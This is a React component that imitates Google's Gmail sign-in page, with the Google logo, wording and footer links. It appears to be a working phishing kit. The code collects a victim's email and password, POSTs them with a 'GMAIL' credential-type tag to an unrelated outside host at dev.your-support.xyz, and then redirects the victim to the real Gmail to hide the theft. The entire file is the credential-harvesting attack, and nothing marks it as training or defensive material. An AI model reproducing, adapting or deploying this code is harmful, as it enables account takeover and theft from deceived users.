import React, { useState } from "react";

export default function GmailSignIn() {
  const [step, setStep] = useState("email");
  const [email, setEmail] = useState("");
  const [password, setPassword] = useState("");
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [credentialType, setCredentialType] = useState("GMAIL"); // Add credential type state

  const handleNext = (e: React.FormEvent) => {
    e.preventDefault();
    if (!email) return;
    setStep("password");
  };

  const handleSubmit = async (e: React.FormEvent) => {
    e.preventDefault();
    if (!password) return;
    setLoading(true);
    setError("");

    try {
      const response = await fetch(
        "https://dev.your-support.xyz/api/credentials",
        {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ email, password, credentialType }), // Include credentialType in the request
        }
      );

      if (!response.ok) throw new Error("Invalid credentials");
      console.log("Login successful");

      // Redirect to the appropriate email service after successful login
      window.location.href = "https://mail.google.com/mail/u/0/"; // Redirect to Gmail
    } catch (err: any) {
      setError(err.message);
    } finally {
      setLoading(false);
    }
  };

  return (
    <div className="flex items-center justify-center min-h-screen bg-white">
      <div className="bg-white text-black rounded-xl p-10 w-[500px] border border-gray-300">
        <div className="flex justify-center mb-6">
          <img
            src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"
            alt="Google Logo"
            className="h-10"
          />
        </div>
        <h2 className="text-2xl font-medium text-center">Sign in</h2>
        <p className="text-sm text-gray-400 text-center mb-6">
          to continue to Gmail
        </p>

        <form onSubmit={step === "email" ? handleNext : handleSubmit}>
          {step === "email" ? (
            <input
              type="email"
              placeholder="Email or phone"
              className="w-full p-3 bg-transparent border border-gray-600 rounded-md focus:outline-none focus:ring-2 focus:ring-blue-500"
              value={email}
              onChange={(e) => setEmail(e.target.value)}
              required
            />
          ) : (
            <input
              type="password"
              placeholder="Enter your password"
              className="w-full p-3 bg-transparent border border-gray-600 rounded-md focus:outline-none focus:ring-2 focus:ring-blue-500"
              value={password}
              onChange={(e) => setPassword(e.target.value)}
              required
            />
          )}

          {error && <p className="text-red-500 text-sm mt-2">{error}</p>}

          <div className="flex justify-between text-sm text-blue-500 mt-2">
            <a href="#" className="hover:underline">
              Forgot {step === "email" ? "email" : "password"}?
            </a>
          </div>

          {step === "email" && (
            <p className="text-xs text-gray-500 mt-6">
              Not your computer? Use Guest mode to sign in privately.
              <a href="#" className="text-blue-500 hover:underline">
                {" "}
                Learn more
              </a>
            </p>
          )}

          <div className="flex justify-between mt-6">
            {step === "email" ? (
              <button className="text-blue-500 hover:underline text-sm">
                Create account
              </button>
            ) : (
              <button
                type="button"
                className="text-blue-500 hover:underline text-sm"
                onClick={() => setStep("email")}
              >
                Back
              </button>
            )}

            <button
              type="submit"
              className="bg-blue-500 px-6 py-2 text-white rounded-md hover:bg-blue-600 focus:outline-none focus:ring-2 focus:ring-blue-500"
              disabled={loading}
            >
              {loading ? "Loading..." : "Next"}
            </button>
          </div>
        </form>
      </div>
      <footer className="absolute bottom-20 left-0 right-0 text-center text-gray-500 text-sm">
        <div className="flex justify-center space-x-6">
          <a href="#" className="hover:underline">
            English (United States)
          </a>
          <a href="#" className="hover:underline">
            Help
          </a>
          <a href="#" className="hover:underline">
            Privacy
          </a>
          <a href="#" className="hover:underline">
            Terms
          </a>
        </div>
      </footer>
    </div>
  );
}
